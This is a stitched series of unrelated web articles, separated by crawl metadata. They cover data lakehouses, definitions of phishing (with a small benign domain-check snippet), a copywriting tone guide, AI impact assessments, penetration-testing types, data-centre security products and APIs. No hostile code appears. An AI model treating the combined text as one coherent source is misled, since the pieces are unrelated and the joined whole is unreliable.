The improvements were largely associated with using the Data Lakehouse architectural pattern to unify robust data management features and advanced analytics capabilities, making critical data accessible to business users from all departments within the organization. The open format further allowed the company to overcome issues such as poor performance, inadequate availability, high cost, and vendor lock-in that come with increased dependence on proprietary technologies. Stringent regulatory requirements are also met satisfactorily, as the Data Lakehouse allows users to upsert, delete and update data records at short notice.
Over the long term, the transition to open-source technologies and the low cost of cloud storage will contribute to the rising popularity of promising new Big Data storage architectural patterns that offer an optimal mix of features from Data Warehouse and Data Lake systems. As this trend continues to rise, the choice between Data Warehouse, Data Lake, and a Data Lakehouse will largely depend on how well users can maximize data quality and establish a standardized data governance model to achieve the desired ROI on their Big Data applications.
If you are interested in discussing your organization’s lakehouse strategy, let’s talk.
What is the definition of phishing?
According to a recent infographic produced by Via Resource, 37.3 million users were subject to phishing attacks in 2012. But what definition of phishing is being used? What does phishing actually mean?
As consumers increase the amount of time that they spend online, cybercriminals are ramping up their productivity – launching larger, more efficient and increasingly targeted attacks against brands both in and outside the financial services industry.
PhishMe delivers email-based anti-phishing solutions. Through our interactions with prospects and customers, we’ve realized that there are several different definitions of phishing floating around and that often the term “phishing” is used interchangeably with terms like “malware” and “spam”.
What’s in a word? Well, it’s an important distinction. While phishing, malware and spam are all rampant in today’s threatscape, they are not one and the same. Pure phishing threats are analyzed and acted upon differently than spam and malware.
A general definition of phishing by Wikipedia:
“Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.”
Phishing is, admittedly, a wide-reaching term. There are several ways to carry out a phishing attack, which is likely where some of the confusion comes into play. In the broad sense, you could say that phishing is any attempt on behalf of a cybercriminal to steal credentials. This can be carried out via a phishing website where the victim is prompted to enter their credentials, or via a malicious executable.
At PhishMe, we categorize a malicious threat as phishing according to the following two rules:
- If the page is representing a brand and asks for any login/personal information.
- If the URL is not, say, “companyname.com”, and a Whois lookup shows the domain is not registered to that company. So, if the URL is ilikepuppies.com and the page displays the logo of a major brand, it is trying to make itself look like that major brand.
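The second rule can be sketched as a small heuristic: extract the host from the URL and check whether it belongs to the brand's registered domain. The sketch below skips the actual Whois lookup and the brand-detection step; the domain names are illustrative:

```python
from urllib.parse import urlparse

def looks_like_phish(url: str, brand_domain: str) -> bool:
    """Flag a URL that displays a brand but is not hosted on the
    brand's own registered domain (per the second rule above)."""
    host = urlparse(url).hostname or ""
    # Accept the registrable domain itself or any of its subdomains.
    return not (host == brand_domain or host.endswith("." + brand_domain))

# A page showing a major brand's logo from an unrelated domain:
print(looks_like_phish("https://ilikepuppies.com/login", "companyname.com"))       # True
print(looks_like_phish("https://mail.companyname.com/login", "companyname.com"))   # False
```

A production check would also consult Whois registration records and handle multi-part public suffixes (such as .co.uk), both omitted here for brevity.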
What’s the difference between Phishing and Malware?
The relationship between phishing and malware is a bit blurry, mostly because they often work together to achieve the goal of the cybercriminal. In fact, the term “malware” is often included in phishing discussions.
Now that being said, here is Wikipedia’s malware definition:
“Malware, short for malicious software, is software used or programmed by attackers to disrupt computer operation, gather sensitive information, or gain access to private computer systems. It can appear in the form of code, scripts, active content, and other software. ‘Malware’ is a general term used to refer to a variety of forms of hostile or intrusive software.”
“….Malware includes computer viruses, ransomware, worms, Trojan horses, rootkits, keyloggers, dialers, spyware, adware, malicious BHOs, rogue security software and other malicious programs; the majority of active malware threats are usually worms or Trojans rather than viruses…”
One key distinction is that not all malware is delivered via email. Malware converges with phishing when it is being used as an accessory to execute the phishing attempt.
When it comes to defining today’s malicious threats, where do you encounter confusion? How do you differentiate between them? Share your thoughts in the comments section below.
A guide to our tone of voice
Before we get started, a warning: You’ll probably find this guide hard to read. That’s because you’re human. Humans find everything hard to read. Books, product guides, blogs, and flat-pack furniture manuals (top of the list). They’re all the same.

CybSafe copy acknowledges this. In response, our copy follows some rules. The rules make our copy easier to read. The rules are listed in part 1 below. To write like CybSafe, follow them.

However, the rules will only get you so far. To really write like CybSafe, you’ll need to convey our tone. You’ll need to favour certain words. You’ll need to add rhythm to your writing. You’ll need to make judgement calls. Occasionally, you’ll need to break reading-ease rules. Tips for conveying CybSafe’s tone are covered in part 2.

But let’s start with part 1 – making your writing easy to read.
Part 1: How to make your writing easy to read
Use sentence case for all titles and subtitles
Sentence case makes our titles and subtitles easy to read. We use sentence casing everywhere. It makes us look professional and aligned. When writing titles and subtitles, only capitalise the following words:
- The first word of the title or heading
- The first word of a subtitle
- The first word after a colon, em dash, or end punctuation in a heading
- Nouns followed by numerals or letters
- Proper nouns (such as the names of people or groups)
Use short sentences
Short sentences are easy to follow. Keep sentences short. Favour full stops over commas. It’s simple stuff.
Use short paragraphs
Short paragraphs are also easy to follow. Plus, short paragraphs inject your copy with white space. When readers see your copy as a whole, short paragraphs ensure they’re not facing an impenetrable wall. Instead, they see digestible segments.
Use simple words
Simple words are easy to take in. Avoid poetic language. Keep syllables low. Favour “use” over “utilise”. Favour “start” over “commence”.
Use subheadings

Reading tests show people don’t read copy in the way it’s written or reviewed. They don’t start from sentence one then continue sequentially. Instead, they see everything at once and scan it all over. Subheadings help with the scanning. They’re signals. Used wisely, they can deliver the message without requiring any further reading. Subheadings should summarise what comes in the paragraph. The subheadings in this guide are a good example.
Avoid jargon

Jargon may puzzle some readers. Make things simple. Use plain English to keep people engaged.
Use conjunctions

Conjunctions are connecting words like “and” and “but”. Conjunctions keep people reading. Use them, and don’t be afraid to use them at the start of your sentences and paragraphs.
Use the active voice
Pen your subjects as active rather than passive. “The students were reading” is active, as the students were getting something done. “The book was read” is passive. The students played a passive role in the reading. They’re not even mentioned in the sentence. If a phrase makes sense after adding “by monkeys” to the end of it, then it‘s passive. (Credit for this analogy goes to Monzo!) 🐒
Avoid clichés

Clichés are tired and unexciting. The phrase “it’s like swimming through treacle” now fails to paint the picture of someone swimming through treacle. It’s unoriginal and unremarkable. The substitute “it’s like wading through hummus” still indicates a struggle, but it’s novel. It paints a picture. Thinking readers may even “feel” the struggle. Avoid clichés to keep people hooked.
Avoid adverbs

Adverbs modify or qualify things. She ran quickly. He said forcefully. With skill, you can eliminate them. She sprinted. He spat. Removing adverbs reduces word count. It also invigorates copy.
Use Hemingway

Hemingway (an editing app) highlights complex sentences and words. It also highlights adverbs and passive phrases. Use Hemingway to weed them out and improve reading ease.
Part 2: How to “sound” like CybSafe
2.1 Choose your tone
As nice as it would be, CybSafe’s tone is not uniform. Context matters. Our tone varies depending on who we’re writing for, what we’re writing about and where we’re writing it.

If this sounds odd, consider how you might talk to a child. Now consider how you might talk to your boss. The different audiences demand different tones. Now consider writing a tweet. Now consider writing a contract. CybSafe’s tone should and does vary. So choose your tone.

That said, our personality is static. At CybSafe, we’re (amongst other things) human, positive, fun, bold and intelligent. Also, we don’t sit on the fence! We’re not afraid to say it like it is. Try sprinkling your copy with each as appropriate.
2.2 How to sound human
Write as you’d speak
In everyday conversation, humans favour simple language. We use the active voice. We avoid jargon. Read your copy aloud. If it sounds off, edit.
Use short sentences… but mix things up
Short sentences are easy to read. That’s why we use them. They’re recommended. But don’t go too far. You’ll sound robotic. When writing CybSafe copy, the occasional comma isn’t really a problem. And, actually, human conversations are full of “unnecessary” words. So favour short sentences. But mix things up. We don’t want to put our readers to sleep.
Avoid jargon… but write for your audience
Human conversation builds rapport. We want to do the same thing with our copy. We want to show our readers we know their world. Jargon can help make that happen. Don’t go overboard. But when writing for CISOs, the occasional reference to something like phishing is fine. Always consider your reader. CISOs know what phishing is.
Use the active voice… unless using the passive voice makes sense
Look at the following active sentence: “Historically, CISOs have made some big security mistakes.”

The sentence is active. To CISOs, it’s also offensive. In human speech, we’re courteous. We use the passive voice to lessen offence. Here’s the passive equivalent: “Historically, some big security mistakes have been made.” The CISOs’ actions have been removed. We’re not pointing fingers at CISOs. We’re not blaming anyone.

Need another example of a passive sentence that makes sense? Here you go: “The CISOs’ actions have been removed.” That’s a passive sentence. The active equivalent is “I’ve removed the CISOs’ actions.” It’s arrogant. It also presumes the reader knows who wrote this document. They might not. So the passive voice makes sense.

Favour the active voice. But be human. Sometimes, the passive voice makes sense.
Avoid adverbs… but make your message clear
“People use weak passwords.” That’s a true statement. It’s also ambiguous. Do people use weak passwords all the time? Or do people only use weak passwords some of the time? “People sometimes use weak passwords.” This introduces an adverb (“sometimes”). But it clarifies things. You could argue “people favour weak passwords” is an adverb-less improvement. But is it? Do people really favour weak passwords? Probably not. Adverbs can clarify meaning. We use them in human speech. So there’s no blanket ban in CybSafe copy. This document includes adverbs throughout.
Use contractions

Replace “would not” with “wouldn’t”. Replace “she will” with “she’ll”. Replace “they are” with “they’re”. You’d do it when speaking. Do the same when writing. There’s one exception to this. If you’re using the same contraction twice in a short span, consider breaking things out, so you are not repeating contractions.
2.3 How to sound positive
Use positive language… but don’t go overboard
Great. Awesome. Incredible stuff. Used sparingly, positive words can create positivity. But when overused, they lose their power. When everything is awesome, awesome is average.
When people get excited, their tone changes. Their faces light up. They’re wide-eyed. You can convey this in copy with the exclamation mark. Great. Awesome! Incredible stuff. Again, take care here. We’re positive. But not intense. The odd exclamation mark is fine. But, when everything is exciting, exciting is average.
2.4 How to sound fun
When people get excited, their tone changes. And people get excited when delivering jokes. You can convey jokes in copy with the exclamation mark. The sentence “Trojans don’t harbour bloodthirsty Ancient Greeks.” conveys no emotion. It forces readers to deduce the joke. The sentence “Trojans don’t harbour bloodthirsty Ancient Greeks!” comes with a signal. The exclamation adds some fun.
Emojis clarify meaning. But, even better, research proves they make for more effective communication. 😃 The great news is you don’t even need to stick to faces. Objects do the same thing! 🎉 Use emojis to reinforce words. Not to replace them. Feel free to use them to make your copy fun. But be careful not to overuse them. One emoji every few paragraphs is about right. It probably goes without saying. Don’t use emojis in formal copy, like proposals and contracts. That would be inappropriate. 😬
Condensing messages implies they’re boring. Elaboration suggests the opposite. You can reiterate. You can give examples. In places, you can say the exact same thing more than once. Yes, the exact same thing… more than once! You’re having fun. So what’s the rush?
Filler is… er… Well, not many people use it to be perfectly honest! Filler is the little words. The unnecessary pauses. Think “um”, “er”, “ah” and “OK”. Use them. Because… well because they’re playful. Filler is fun.
“CybSafe copy specifies for clarity. And because we’re fun.” OK, the above is specific. But it could be more specific: “CybSafe copy specifies for clarity. And because we’re a little bit fun.” Notice the direction of specificity makes very little difference: “CybSafe copy specifies for clarity. And because we’re really quite fun.” The additional specificity is a form of elaboration. It elongates copy. Who cares? It’s fun!
Ditch the formalities. Not always. But, in places, feel free to loosen your tie. “Yes” can be “we get you”. “No” can be “Negative”.
Sigh. Moan. Groan. Nod. Yawn. Inhale. Gulp. Squirm. You won’t find expressions in formal copy. Fun copy, however, rarely holds back.
We know, we know. Conveying empathy isn’t easy. So try this simple trick: Go ahead and note what you think your reader is feeling. Then tell your reader you understand. Confused? That’s understandable! You might find adapting this paragraph helps.
Step outside of work mode. Passwords are hard to remember! Security is sometimes confusing! Don’t disagree with your reader. Charm them. Here’s a good example: “Have I been pwned?” is internet slang for “have I been owned?”… which is internet slang for “have I been defeated?”. So much slang! Well, security is cool… 😎
2.5 How to sound intelligent
Use simple words… but vary vocab
You can add varied vocabulary to your copy. Or you can weave it in. You can lace your copy. You can inject it. You can sprinkle your copy with varied vocab. You can pepper it. Or dust it. They’re simple words – but they’re unusual. They’re metaphorical. They paint pictures and add excitement. They make copy sound intelligent.
Use short sentences… but beware of fragments
“Fragmented” sentences are incomplete sentences. They either omit a subject or a verb. They’re often powerful. Just look at the fragmented sentences in the paragraph below:

The consequences of poor security can be extreme. Data loss. Theft. Even death.

The fragmented sentences (“Data loss. Theft. Even death.”) are cutting. But they’re also grammatically incorrect. Only use fragments knowingly. Inadvertent fragments undermine our intelligence.
Intelligent people guide others. They usher them along. How? Questions help. Questions let you posit answers. They also echo your reader’s thoughts. They keep your reader following along. Questions keep your copy engaging.
Take care with rhetoric
When you ask rhetorical questions, people can disagree. This undermines our intelligence. Here’s an example. Why not use rhetorical questions in your copy? There’s a good reason why not: they undermine our intelligence. When penning rhetorical questions, make sure there’s no room for disagreement.
Avoid ending sentences with prepositions
At. In. Of. To. At best, ending sentences with prepositions is informal. At worst, it’s dumb. Consider: “Which journal was your article published in?” You won’t see it much in writing. “In which journal was your article published?” is an intelligent alternative.
Use Hemingway… but overrule
Hemingway can be a bit like a game. It tells you what you need to fix. You fix it. You score a point. This makes it tempting to do everything Hemingway suggests. But remember: Hemingway is an algorithm. It has limitations. It knows what you’re doing. But it’s not sure why. It’s not sure why you’re using adverbs. It’s not sure why you’re using complex language. Don’t be scared to overrule Hemingway. Remember it’s an algorithm. Tone aside, the algorithm sometimes gets things wrong.
2.6 How to sound bold
Get to the point. Use one word instead of two. Make your meaning clear. I think we should probably do this. That’s indecisive. We should do this. That’s more like it.
That wouldn’t work. That would not work. “Wouldn’t” is casual. “Would not” carries gravitas. Replace the odd contraction to make a phrase sound bold.
Here’s an example: “We can be bold even when opportunities are scarce.” Now with emphasis: “We can be bold *even when opportunities are scarce*.” The italics signal emphasis. They’re the equivalent of leaning in and delivering a line with punch. When used correctly, emphasis ensures we sound bold.
Write in the present tense
Humans can prevent data breaches. Humans prevent data breaches. The former includes a caveat. There’s doubt in the sentence. The latter, present-tense sentence is assertive. It’s inarguable. It’s bold. Favour the present tense.
Heroes are bold. You can include them in your copy. CybSafe can be a hero. We reduce cyber risk. But that’s a little arrogant. If possible, our reader should be the hero. With CybSafe, you reduce your cyber risk. With CybSafe, you help your family.
A visionary tone will often manifest itself in conclusions. It’s nurtured through rhythm. As you’re writing, picture great leaders and famous speeches. Tune into triumphant music playing in the background. Let it build. And build. Let it build even more. In your final few sentences, let the music blare. Say something visionary. Allow your syllables to rise! Then step back… Let things die down… Make your closing remark. Repeat the remark. It creates a visionary tone.
2.7 Avoid writing these things
Employees

Employees are people. They’re not inanimate, unthinking objects. Humanise. As opposed to referring to ‘employees’, refer to ‘people’. This makes our message clear.
Users

Only two groups of people call their customers “users”. Security professionals and drug dealers. Try to humanise where you can: as above. 👌 Overall, use inclusive language. Respect diversity. Avoid words and terms that reflect stereotyped or prejudiced views of certain groups or people. Some words are okay to use in some contexts, but not in others. So be mindful! 🧠
People are the weakest link (actually, never write this!)
This reinforces a questionable school of thought: it implies people are a vulnerability to be patched. They’re not. People are a defence. Although it’s unreported, people prevent breaches. We want to highlight this. As opposed to declaring people a weak link, highlight their positive security role. People are our strongest defence.
People cause breaches
Criminals cause breaches. People prevent them.
(When referring to CybSafe) “Training”
CybSafe is not training. It’s a platform. It’s software. CybSafe manages human cyber risk.
2.8 Use sound judgement
As a parting note, the advice in this document is generic. In places, it’s conflicting. You might decide to go against it. If there’s a good reason to do so, go for it. Writing isn’t an exact science. So use your judgement. And have fun along the way.
Part 3: Bonus step: Read
The more you read, the better your writing will be. Reading CybSafe copy will show you what you’re aiming for. Read CybSafe course content. Read CybSafe marketing and internal communications, too. You don’t need to stop there. There are dozens of good copywriting resources available. Below are a few to start with.
Some good books on writing copy
- How to write better copy by Steve Harrison
- The copy book by D&AD
- Write to sell by Andy Maslen
- Scientific advertising by Claude Hopkins
- Common sense direct and digital marketing by Drayton Bird
- Tested advertising methods by John Caples
Some good books on writing in general
- On writing: A memoir of the craft by Stephen King
- Politics and the English language by George Orwell
- Into the woods: How stories work and why we tell them by John Yorke
- The reader’s brain by Yellowlees Douglas
- The elements of eloquence: How to turn the perfect English phrase by Mark Forsyth
Zen and the Art of AI Impact Assessments
Have you ever walked into a room and forgotten what you were thinking or your purpose in going to that room? Don’t worry, this isn’t a sign of mental deficiency. It is a well-known side-effect of how human memory works. In psychology it is called the doorway effect.
There is a physical limit to the number of concurrent ideas humans can hold in our conscious thoughts. This limit on our working memory is low: only four independent ideas at once. Scientists believe that since it’s helpful for survival to prioritize thoughts and attention to what is happening around us, our brains have evolved to free up cognitive resources as we change locations, resetting our memories and thoughts as we walk through a door.
Compounding the doorway effect is cue-dependent forgetting, the failure to recall information without memory cues. When removed from our usual work environment to participate in an AI project, there is the risk that strategic business goals and everyday business rules will be forgotten.
It’s safe to say that most data science fails are inadvertent rather than malicious. A deep dive case study into several high profile AI failures revealed a common narrative: people meant well but they didn’t stop to think what could go wrong. Their lack of AI governance inevitably led to embarrassing failures.
Zen and AI Governance
Have you ever driven a car and realized that you don’t remember how you got to your destination? Sometimes we undertake a task without consciously thinking about it. On the other hand, the practice of zen seeks to enhance conscious observation and deliberate decision-making. The dictionary definition of zen is a state of meditative calm in which one uses direct, intuitive insights as a way of thinking and acting.
Have you ever peered into the cockpit of an aircraft when boarding a flight and seen the pilots sitting there holding a checklist? The purpose of these checklists is to avoid complacency and to ensure conscious observation of risk management.
AI governance should be proportionate to the risk. AI impact statements are not always necessary. But when there is material risk, it helps to list, then consciously investigate these risks.
The Need For Documentation
While AI projects may seem the domain of data scientists and IT professionals, research shows the vital role of business subject matter experts. In “Winning With AI” in the MIT Sloan Management Review, the authors report that when IT specialists lead AI projects they have half the success rate of projects where business line specialists lead AI projects. This isn’t a criticism of IT specialists, but rather a reminder that AI projects require a broader frame of reference than conventional IT projects, and AI projects are more about business transformation rather than technology.
But when business subject matter experts join an AI project, the experience can be much like stepping through a doorway into a different room. All too often when they leave behind their normal business routine, their cubicle or office, and surround themselves with data specialists talking unintelligible jargon, business subject matter experts are tempted to forget about the business imperative and let it play second fiddle to the technology.
Documenting the business goals, the business processes, and the stakeholders reinstates the memory cues, reminding the entire project team that the AI project is business focused.
Describing an AI System
Start with the why. Before you get into the details of how it will operate, start by documenting the purpose of the AI system. Describe the business goal and the metric used to measure business success. Business goals can include increasing sales, reducing errors, making a process more efficient or fairer, or removing frictions from customer experience. If there is more than one business goal, explain the hierarchy of those goals. Since nothing is perfect, define acceptable tolerances in system accuracy and business value achieved. Explain why the chosen solution will use AI rather than the alternatives, and how the AI system will help to achieve the business goals (i.e., what are the specific benefits expected from using AI versus alternatives).
Next, list the system constraints and the expected behaviors of the system. These will include regulatory requirements, business rules, common-sense heuristics, and ethical values. For example, regulatory rules could include not selling alcohol to minors, while a business rule or common-sense heuristic is that the price you charge for your products or services must not be negative. Relevant ethical values could include fairness or disclosure requirements.
AI requires data for training and for operation. Describe the provenance of the data, who owns the data, its quality, and relevance. An AI system is always part of a business process. Describe the revised business process that uses the AI system, the workflow, how the system will be used, and by who.
Finally, and most importantly, you need to list the people who will be stakeholders in the AI system’s operation and describe how the AI system will benefit them. This list will include, but is not limited to:
- The organization deploying the AI system
- Other end-users
- The natural environment
If you’re looking for inspiration on which attributes to document, there are several standard checklists worth adding to your reading list. Remember that every AI system is unique; use these lists for inspiration rather than as a compliance box-ticking exercise.
Risk management of complex systems often requires more structure and conscious consideration than simpler processes. By describing the business goals, rules, business processes, and stakeholders, you not only communicate a common understanding for all members of the project team, you also make it less likely that you will forget what’s most important and what can go wrong. | <urn:uuid:9eb8eef0-d5de-49db-b8bf-616543b2f228> | CC-MAIN-2022-40 | https://www.datarobot.com/blog/zen-and-the-art-of-ai-impact-assessments/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00294.warc.gz | en | 0.936253 | 1,182 | 2.53125 | 3 |
13 April, 2022
Decode Black Box, Grey Box and White Box in PenTesting
Before we dive into answering this complex question, let’s first take a moment to understand what Penetration Testing is.
Penetration Testing, otherwise known as PenTesting, is a process for identifying the weaknesses in an organization’s digital environment, intended to elevate security posture and build resilience against cyber-attacks. Traditionally, Penetration Testing has been conducted either manually, using a consultant-based model, or with automation, using a software tool. In the era of digital business and the modern digital landscape, however, these methods do not scale and they inhibit faster decision making. As a result, organizations are quickly revamping their PenTesting methodology and adopting a combination of human-led, AI-based PenTesting. This combined approach gives businesses the best of both worlds: human ingenuity identifies exploitable vulnerabilities and business-logic flaws that are invisible to automated tools, while automation ensures comprehensiveness, scale, and faster time to value. The objective of Penetration Testing is to surface weak points or vulnerabilities within the digital landscape by simulating a cyber-attack before a cyber adversary gets the chance to exploit them.
So, what are the most common types of assets being tested?
Many organizations develop their web applications or websites using a global community of developers, meaning that externally hired developers are involved in the development of their web applications. Whether an organization’s web application was developed by full-time employees or by a contractor, there is always cybersecurity risk involved. Modern applications are not written from scratch but are assembled from open-source and commercial components to reduce time to market.
These vulnerabilities in web applications arise for two primary reasons:
- Lack of security testing during the Software Development lifecycle (SDLC)
- New vulnerabilities are being discovered in the open source or commercial components used in the application.
A recent example is the Spring Framework RCE vulnerability, CVE-2022-22965. The Spring Framework (Spring) is an open-source application framework that provides infrastructure support for developing Java applications.
Another example: according to OWASP (the Open Web Application Security Project), 94% of web applications tested reported some variation of broken access control, meaning that users of lower privilege had a way to access higher-privilege information they should not have had access to. This can cause major issues for an organization that handles sensitive information such as health records and financial details. It is always a smart decision to have your web application tested for data leaks, authentication failures, and failed access controls, any of which could result from a coding flaw, a design flaw, or poor maintenance.
Whether organizations are born in a cloud, traditional, or hybrid environment to manage and enable their business, network Penetration Tests help discover exploitable vulnerabilities and put them through the process of remediation within a network whether it be in a workstation, server, or another device. External network Penetration Tests help paint a picture of the attackers’ view (outside-in) and involve perimeter examination to ensure that there are no access points between the external and internal network that should not be there. Internal and external network Penetration Tests are often performed in tandem with one another.
Modern-day businesses require modern-day solutions, which is why many organizations utilize iOS and Android mobile applications to communicate with and serve their employees’ and customers’ needs. Similar to a web application, it is important to identify and remediate exploitable vulnerabilities within a mobile application before attackers do. In a mobile application Penetration Test, it is common to test for any authentication, data leakage, and authorization issues.
APIs
If an API endpoint has a detected vulnerability, a cyber adversary can take advantage of it to access sensitive data stored in an organization’s application.
Now that we understand which assets are commonly tested during Penetration Tests, what is the difference between conducting White Box, Black Box, and Grey Box Penetration Tests?
An organization that is looking at starting its PenTesting journey should follow this approach from the beginning:
- Black Box testing for an attackers’ view to cover a broader scope
- Grey Box testing for an insider view with minimal access
- White Box testing for a much deeper inside view
It would be an exercise in futility for an organization to conduct Black, Grey, and White box testing back-to-back without remediating the vulnerabilities identified at each stage; the volume of findings would overwhelm the team and make the remediation process more difficult than necessary in the long run.
Black Box Penetration Test
Black Box Penetration Tests are the closest thing to simulating a real-life attack on a digital asset, as the ethical hacker is given absolutely no information or credentials for any part of the asset being tested. For example, in a Black Box test conducted on a web application, a PenTester attempts to access privileged information or controls within the application as if they were a real cybercriminal. Any success means that exploitable vulnerabilities exist within the asset and that the web application is not secure, a finding made all the more serious because the tester was given no inside information to work with.
White Box Penetration Test (All details & credentials are available to PenTesters)
White Box testing helps identify vulnerabilities from an insider’s view. If an attacker gains an initial foothold in the system or application of a company insider, White Box Penetration Testing can reveal the types of vulnerabilities that could be exploited in that event, as well as the impact they could cause. White Box PenTesting requires a client to share details such as asset information and credentials with their Penetration Tester. While White Box Penetration Testing does not closely simulate a real-world cyber-attack, it is a cost-effective and time-saving way of conducting a Penetration Test.
In the case of web applications, the Penetration Testing scope would also include code-review to identify the vulnerabilities arising from the coding practices used.
Grey Box Penetration Test
In a Grey Box Penetration Test, a limited amount of information is given to the PenTesters conducting the test. Grey Box Penetration Testing allows for an “inside and out” approach, giving the PenTesters the opportunity to test every side of an application, which is much of the reason why it is the most common type. In many cases, PenTesters are given login credentials to either a network or an application to test the access privileges between distinct levels of users within an asset.
For example, a web application in the healthcare industry could involve a login portal for doctors and patients; it would be an extreme breach of privacy for patients to be able to access confidential data about other patients that should only be available to doctors. Grey Box Penetration Testing ensures that there are no vulnerabilities that would allow that to happen.
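The access rule a Grey Box tester would probe in that healthcare scenario can be sketched as a simple check. The roles, fields, and policy below are hypothetical assumptions for illustration; a real test would exercise the live application with each set of credentials rather than a local function.

```python
def can_view_record(requester, record):
    """Hypothetical access policy: doctors may view any record,
    patients may view only their own."""
    if requester["role"] == "doctor":
        return True
    return requester["role"] == "patient" and requester["id"] == record["patient_id"]

doctor = {"role": "doctor", "id": "d1"}
alice = {"role": "patient", "id": "p1"}
bob = {"role": "patient", "id": "p2"}
record = {"patient_id": "p1", "notes": "confidential"}

# A grey-box tester verifies each credential level against the same record.
print(can_view_record(doctor, record))  # doctor: allowed
print(can_view_record(alice, record))   # record owner: allowed
print(can_view_record(bob, record))     # other patient: must be denied
```

If the last check ever returns True in the real application, the tester has found exactly the broken access control described above.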
It is worth noting that the main difference-maker between each type of Penetration Test is in the amount of information being given to the Penetration Tester by an organization. Since there are so many variables when it comes to choosing the right Penetration Test based on scope, budget, timeframe, and more, it is imperative that your Penetration Testing vendor has expertise in all areas.
BreachLock has extensive experience in all areas of Penetration Testing discussed here, and it also holds certifications across many key areas, such as ISO 27001, CREST, OSCP, and OSCE. There are many great options out there, but doing your due diligence with research before engaging with a vendor will ensure that your organization is in good hands and that you achieve the desired objective of the PenTesting engagement.
For most companies, cyber security has always been about keeping criminals out of their data centers with the best firewalls money could afford. Firewalls are great, they can keep most of the criminals out, but not all of them. It’s only a matter of time until a hacker is able to figure out how to get past the most recent firewall update. Then it turns into a game of cat-and-mouse, as the IT team struggles to update their firewalls, and the criminals find new ways to sneak through them.
The problem with this model is, once a criminal is able to get past those defenses, there usually aren’t many security measures blocking them from moving around the network completely undetected.
In order to remain undetected, hackers use “east-west” traffic, or server-to-server traffic within the data center. Hackers have learned not to leave the data center to access another network or anything outside the data center. Instead, they are able to stay within the system for months on end, simply by avoiding the main security measures. During that time, they can be gathering important information or creating millions of other problems.
These east-west paths were created to lower latency in the data center, and because it would be difficult to prevent threats with firewalls alone. So, most companies have not implemented many blocks for east-west traffic, instead, they have focused all their efforts on the “north-south” traffic, through the gateway.
Protecting data centers with firewalls alone, without trying to detect the criminals who sneak inside, means that most companies don’t even know their network has been hacked until the hackers are long gone and their data has already been compromised.
A recent report by CIO found that half of IT professionals say the loss of data is their top security risk. That’s because the average data breach in 2015 cost a company $3.79 million, which translates to a global loss of around $500 billion annually. By 2019, that cost is predicted to quadruple to $2.1 trillion globally.
As businesses rely on their data centers to store more and more of their valuable information, there will be greater and greater threats to those data centers, and thus, a need for newer and smarter security methods to stop them. Here are three examples of new security measures that data centers are taking to detect attackers and prevent them from attacking in the first place.
Focus on the Threats with Cisco’s FIREPOWER
The Cisco Firepower won this year’s Interop security award with its next-generation firewall (NGFW), which Cisco claims is the industry’s first ‘threat-focused’ NGFW.
The firewall is able to detect threats by understanding how normal users are connecting to applications, and comparing that information with threat intelligence. The threat detection allows businesses to identify and stop threats before they become any more serious.
David Goeckeler, senior vice president and general manager of Cisco’s Security Business Group, explains that Firepower allows for “better protection, and faster detection and response to advanced threats. [It] will help our customers build a dynamic, resilient secure infrastructure to combat threats in real-time.”
In addition, the NGFW unifies the management of all firewall functions, from application control to threat prevention and malware protection, through a single management console, making it much easier to manage your firewalls across the network.
Analyze your data center’s weaknesses with ASAP
This year, the Cyber Defense Magazine InfoSec awards named Illumio’s “Attack Surface Assessment Program” (ASAP) the most innovative data center security solution of 2016. ASAP is an advanced algorithm that generates a map of all your data center activity and identifies all of the active and inactive pathways.
Nathaniel Gleicher, the former Director for cyber security policy at the White House, developed the program for Illumio. He says it allows users to analyze the traffic in their network, their applications, their environments, their servers, and how each of the separate parts communicate with each other.
In their two-step program, Illumio gives a business a simple script to run, which generates a roadmap of all the data center activity. Then, Illumio analyzes the data, and presents the business with a detailed report on all the weak points within the network, identifying the most likely areas an attacker could infiltrate. ASAP gives businesses the power to understand their network and the best places to defend against an upcoming attack.
Nathaniel Gleicher explains: “One of the challenges is that the attack surface can be so vast. If you try to secure everything equally, you often end up not securing everything enough. You need to prioritize security around your most valuable information.”
In addition, ASAP can also detect where a malicious signal is coming from, and quickly allow the IT team to isolate and quarantine the server the connection is coming from. This would allow a business to stop a cyber-attack in progress, and provide the business with a lot more information about the paths that cybercriminals are utilizing, making it much easier to stop a future attack from the same paths.
Trust No One with VMware NSX & Micro-segmentation
Traditionally, businesses have segmented their networks with physical firewalls and routers, which were able to control traffic between web tiers, application tiers, database tiers, and the internet. But, all these firewalls made life difficult for IT teams. It was time-consuming and confusing to implement even small changes across a large network, and, in the end, they didn’t do a very good job of stopping breaches in the first place.
With the advent of software-defined data centers (SDDCs), companies were finally able to segment their networks in software written to the needs of their business. This approach, called micro-segmentation, can detect threats from anywhere within the data center, and it can create and change security policies automatically, all while matching the speed and complexity of the workloads it protects.
Micro-segmentation can give a zero-trust level to every individual workload, which means cyber criminals can no longer piggyback on legitimate users, or hide in the dark corners of your data center.
As it is described in the white paper, Micro-Segmentation Builds Security into Your Data Center’s DNA, “physical security (with firewalls and routers) is like using gloves to guard against germs. It is external, limited protection (if someone sneezes in your face, you’re probably going to end up with a cold or flu). Micro-segmentation is like fortifying the immune system of the data center: germs (or malware) can’t get in.”
In addition to protecting the information on data centers, Micro‐segmentation also enables companies to use the security measures of the SDDC on their desktop computers and mobile environments alike.
Firewalls have their problems, but they are not going away anytime soon. However, future businesses are not going to rely solely on their walls to protect them from outside invaders. They can now keep a few guards inside of the walls to protect them in case an attacker ever gets inside. | <urn:uuid:6ed3c27f-c93a-4404-b194-58cf6ab3e579> | CC-MAIN-2022-40 | https://www.colocationamerica.com/blog/data-center-security-more-about-detection | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00494.warc.gz | en | 0.952979 | 1,526 | 2.546875 | 3 |
An Application Programming Interface (API) is a set of definitions and protocols for building and integrating application software. APIs let your product communicate with other products and services without having to know how they’re implemented. This simplifies app development, saving time and money. When designing new tools and products, or managing existing ones, APIs give you flexibility, simplify design, administration, and use.
Some well-known APIs include Google Maps, Amazon, and YouTube. These APIs allow web designers to integrate and embed products into their websites. For example, a web designer who wants to show customers where the company’s office is located can embed a Google Map directly in the site. The YouTube API is one of the most common, allowing designers to embed any YouTube video on their website. APIs essentially allow organizations to keep their own branding while also using another service or product that is more capable of a certain task.
